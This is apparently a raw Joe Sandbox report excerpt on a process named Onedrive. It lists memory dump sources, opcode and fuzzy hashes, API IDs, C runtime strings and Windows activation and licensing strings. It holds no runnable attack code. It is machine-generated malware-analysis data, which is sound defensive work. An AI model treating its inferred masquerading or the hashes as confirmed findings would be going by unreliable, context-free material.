                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: ba2b6f105ae3816e086ea7a8ddb470942bd15c703735edc8651067e593597a60
                                                    • Instruction ID: 7c2e9f98e99982aad0313e2347af64ad475b207f353cad965ec530896de9b552
                                                    • Opcode Fuzzy Hash: ba2b6f105ae3816e086ea7a8ddb470942bd15c703735edc8651067e593597a60
                                                    • Instruction Fuzzy Hash: 16B01224F29402C1D608AB62DC9606112B17F7C300FC04831D00FC0720DE1CD59FD710
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: cAAFvCF*&
                                                    • API String ID: 0-870564915
                                                    • Opcode ID: 4bb7de6d471c858b184386500e942d622e63483a6994dd825a79aa6e95874214
                                                    • Instruction ID: c4caa592676ba76de069cbe01b6c1e830715df1145796689edea89b15970725b
                                                    • Opcode Fuzzy Hash: 4bb7de6d471c858b184386500e942d622e63483a6994dd825a79aa6e95874214
                                                    • Instruction Fuzzy Hash: 58719036714A0287DB898F29E971A7837A1F744780B45923AEEAEDB3D4DB3CD841C740
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000003.1837365304.000001729DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001729DD20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_3_1729dd20000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 80c036b92ef97acd21fe0ddbe3dc026513253f78371ca749ad679c4476b99894
                                                    • Instruction ID: eaddcb5e27eb18dbc2859a522ec0d9ecf3f38d2fb52ebf4f7077b6b93efbc25c
                                                    • Opcode Fuzzy Hash: 80c036b92ef97acd21fe0ddbe3dc026513253f78371ca749ad679c4476b99894
                                                    • Instruction Fuzzy Hash: F4622C70218B488FDBA4DF18C488BA6B7E1FB98304F5546ADE58DD73A1CB70E945CB42
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000003.1837365304.000001729DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001729DD20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_3_1729dd20000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eb9f7026369abc2f533983e64922662aaf186562180a13f1a63ba32285e1e16d
                                                    • Instruction ID: ff06ba7e8e2b54852236382a00cd9d26c9086a23e07737af1ae8a6c0231decba
                                                    • Opcode Fuzzy Hash: eb9f7026369abc2f533983e64922662aaf186562180a13f1a63ba32285e1e16d
                                                    • Instruction Fuzzy Hash: 7912713121CA188FEB98DF1CC454BA6B7E1FB99304F580169D64DC7291CB74EC86DB92
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000003.1837365304.000001729DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001729DD20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_3_1729dd20000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f703cd1896e92a8ea5974dddae7fbdbbbeff298064ce552387292163702aa10e
                                                    • Instruction ID: 10b3a47ccf595b57c77aec65090be32d3a9f53021582ed2f5680ca09d14d79cf
                                                    • Opcode Fuzzy Hash: f703cd1896e92a8ea5974dddae7fbdbbbeff298064ce552387292163702aa10e
                                                    • Instruction Fuzzy Hash: 3261F52612D2D54AD34E863848523FAFFE1DB97318F4CAAADF5CBC3283D41094879392
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e48766748434b3bff571e46740c1065f90807cda6717c7d4accfc1540458af72
                                                    • Instruction ID: 2c40698e652a3e17a50b5c69ca4a79ae6f67bac53d71cc2ef63dfb40fb142f8c
                                                    • Opcode Fuzzy Hash: e48766748434b3bff571e46740c1065f90807cda6717c7d4accfc1540458af72
                                                    • Instruction Fuzzy Hash: 1B1165B27197418BEB56CF29E465726BBA0FB48344F41853AD9EC9B798DB3CD0408F00
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _invoke_watson_if_error$_aligned_msize$__vcrt_lock$FileWrite_wcsftime_l
                                                    • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportA$_itoa_s(nLine, szLineMessage, 4096, 10)$e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))$minkernel\crts\ucrt\src\appcrt\misc\dbgrptt.cpp$strcat_s(szLineMessage, 4096, "\n")$strcat_s(szLineMessage, 4096, "\r")$strcat_s(szLineMessage, 4096, szUserMessage)$strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$strcpy_s(szOutMessage, 4096, szLineMessage)$strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")$wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _wcsicmp
                                                    • String ID: Cleanup$EvalNotify$GenericUnlicensed$IAActivationFailure$KernelExpiration$LastNotificationId$NeverActivated$NoProductKey$OEMCOAActivationFailure$OEMSLPActivationFailure$ReActivateRequired$RebootRequired$RepairRequired$TBLExpiring$TamperDetected$TimebasedExpired$VolumeBindingKMSNonSLP$VolumeBindingServiceNCount$VolumeRenewalRequired$VolumeUnlicensed
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_$CriticalLock::_ReentrantScoped_lockScoped_lock::~_$ComputeMallocaSchedulerScheduler::_Size$AllocaByteCharMarkMultiWide__crt_scoped_stack_ptr_freea_crtnew[]
                                                    • String ID: minkernel\crts\ucrt\src\appcrt\locale\lcmapstringa.cpp
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _aligned_msize_invoke_watson_if_error$_controlfp_sfegetenv
                                                    • String ID: $1#IND$1#INF$1#QNAN$1#SNAN$__acrt_fltout$minkernel\crts\ucrt\src\appcrt\convert\cfout.cpp$strcpy_s(result, result_count, "0")$strcpy_s(result, result_count, "1#IND" )$strcpy_s(result, result_count, "1#INF" )$strcpy_s(result, result_count, "1#QNAN")$strcpy_s(result, result_count, "1#SNAN")
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_CriticalHandleLock::_ModuleReentrantScoped_lockScoped_lock::~__invoke_watson_if_error
                                                    • String ID: File: $Line: $Module: $(*_errno())$...$@$@$Expression: $Microsoft Visual C++ Runtime Library$_CrtDbgReport: String too long or IO Error$common_message_window$minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp$traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character()))$wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error")
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_CriticalHandleLock::_ModuleReentrantScoped_lockScoped_lock::~__invoke_watson_if_error
                                                    • String ID: File: $Line: $Module: $(*_errno())$...$@$@$Expression: $Microsoft Visual C++ Runtime Library$_CrtDbgReport: String too long or IO Error$common_message_window$minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp$traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character()))$wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error")
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $__acrt_report_runtime_error$minkernel\crts\ucrt\src\appcrt\internal\report_runtime_error.cpp$wcscat_s(outmsg, (sizeof(*__countof_helper(outmsg)) + 0), L"\n\n")$wcscat_s(outmsg, (sizeof(*__countof_helper(outmsg)) + 0), message)$wcscpy_s(outmsg, (sizeof(*__countof_helper(outmsg)) + 0), L"Runtime Error!\n\nProgram: ")$wcscpy_s(progname, progname_size, L"<program name unknown>")$wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3)
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Frame$BlockHandler3::$StateUnwind$Affinity::operator!=BaseConcurrency::details::ControlEstablisherExceptionFac_nodeFac_node::_FeatureFileFromHandlerHandler4::HardwareHeaderImageIs_bad_exception_allowedMap::endMap::iterator::operator++PresentProcessorRaiseThrow_aligned_msizestd::_std::bad_alloc::bad_allocstd::exception::exceptionweak_ptr
                                                    • String ID: csm$csm$csm
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _wcsicmp
                                                    • String ID: ENVIRONMENT$OEM_COA_NSLP$OEM_COA_SLP$OEM_DM$OEM_SLP$RETAIL$TIMEBASED_EVAL$TIMEBASED_PROMO$TIMEBASED_SUB$TIMEBASED_TRIAL$UXDifferentiator$VOLUME_KMS
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CIDEdit1$CIDEdit2$CIDEdit3$CIDEdit4$CIDEdit5$CIDEdit6$CIDEdit7$CIDEdit8
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Direct$Parser@$CreateElement@V12@$#100.Create@CurrentDescendent@Destroy@E__@@0@Element@2@1FindFromItemObjectQueueResource@ThreadUserV32@@Value@2@Work
                                                    • String ID: EnterNumber$LocationCombobox$PhoneActivation$TouchID
                                                    APIs
                                                    • Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FFDF3AF70B1
                                                    • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDF3AF70E7
                                                      • Part of subcall function 00007FFDF3AF78D0: type_info::_name_internal_method.LIBCMTD ref: 00007FFDF3AF78F4
                                                      • Part of subcall function 00007FFDF3AF72C0: Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FFDF3AF72E0
                                                    • Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FFDF3AF71B7
                                                      • Part of subcall function 00007FFDF3AF7880: __CxxFrameHandler2.LIBCMTD ref: 00007FFDF3AF78B8
                                                    • _invoke_watson_if_error.LIBCMTD ref: 00007FFDF3AF7234
                                                    • __crt_unique_heap_ptr.LIBCMTD ref: 00007FFDF3AF727F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_$CriticalLock::_ReentrantScoped_lockScoped_lock::~_$FrameHandler2SchedulerScheduler::___crt_unique_heap_ptr_invoke_watson_if_errortype_info::_name_internal_method
                                                    • String ID: %ls$*$?$common_expand_argv_wildcards$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$result != nullptr$traits::tcsncpy_s( character_it, character_count - (character_it - character_first), *it, count)
                                                    APIs
                                                      • Part of subcall function 00007FFDF3AE93E0: Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FFDF3AE9427
                                                    • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDF3AE94B0
                                                      • Part of subcall function 00007FFDF3AD39B0: __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FFDF3AD39BE
                                                    • Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FFDF3AE9514
                                                    • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDF3AE955E
                                                    • __crt_unique_heap_ptr.LIBCMTD ref: 00007FFDF3AE9579
                                                      • Part of subcall function 00007FFDF3AD85F0: __crt_unique_heap_ptr.LIBCMTD ref: 00007FFDF3AD85FE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_$CriticalLock::_ReentrantSchedulerScheduler::_Scoped_lockScoped_lock::~___crt_unique_heap_ptr$__crt_scoped_stack_ptr
                                                    • String ID: create_environment$minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp$minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp$s$traits::tcscpy_s(variable.get(), required_count, source_it)
                                                    APIs
                                                    Strings
                                                    • minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp, xrefs: 00007FFDF3B05FD4
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_$CriticalLock::_ReentrantScoped_lockScoped_lock::~_$ComputeMallocaSchedulerScheduler::_Size$AllocaByteCharMarkMultiStringTypeWide_freea_crtnew[]
                                                    • String ID: minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp
                                                    • API String ID: 3292198129-24854585
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _wcsicmp
                                                    • String ID: ENVIRONMENT$OEM_COA_NSLP$OEM_COA_SLP$OEM_DM$OEM_SLP$RETAIL$TIMEBASED_EVAL$TIMEBASED_PROMO$TIMEBASED_SUB$TIMEBASED_TRIAL$VOLUME_KMS
                                                    • API String ID: 2081463915-1302943250
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: swap_c
                                                    • String ID: %ls$base != nullptr || num == 0$comp != nullptr$minkernel\crts\ucrt\src\appcrt\stdlib\qsort.cpp$qsort$width > 0
                                                    • API String ID: 1232431964-1732429825
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: ExecuteShell$CreateFolderFreeFromItemKnownListObjectTaskmemset
                                                    • String ID: %systemroot%\system32\changepk.exe$p$page=SettingsPageActivate$windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel
                                                    • API String ID: 3005131752-2606238965
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::__invoke_watson_if_error$CriticalLock::_ReentrantSchedulerScheduler::_Scoped_lockScoped_lock::~___crt_unique_heap_ptr
                                                    • String ID: copy_and_add_argument_to_buffer$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count)$traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length)
                                                    • API String ID: 3160871131-1477255430
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule
                                                    • String ID: EtwEventEnabled$EtwEventRegister$EtwEventUnregister$EtwEventWrite$ntdll.dll
                                                    • API String ID: 667068680-1838325978
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: strrchr
                                                    • String ID: %ls$a$d$fp_format_a$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$p$p$result_buffer_count > static_cast<size_t>(1 + 4 + precision + 6)
                                                    • API String ID: 3418686817-2728534095
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _aligned_msize_invoke_watson_if_error
                                                    • String ID: %ls$d$e+000$fp_format_e_internal$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1)$strcpy_s( p, result_buffer_count == (static_cast<size_t>(-1)) ? result_buffer_count : result_buffer_count - (p - result_buffer), "
                                                    • API String ID: 1871870440-2583523412
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess$DirectoryErrorLastSystem
                                                    • String ID: Tapi32.dll
                                                    • API String ID: 2626721824-1902342089
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Free$Process$DirectSelect@StringTouch$AllocDirectoryErrorIndex@LastSelectionString@System
                                                    • String ID:
                                                    • API String ID: 796372636-0
                                                    APIs
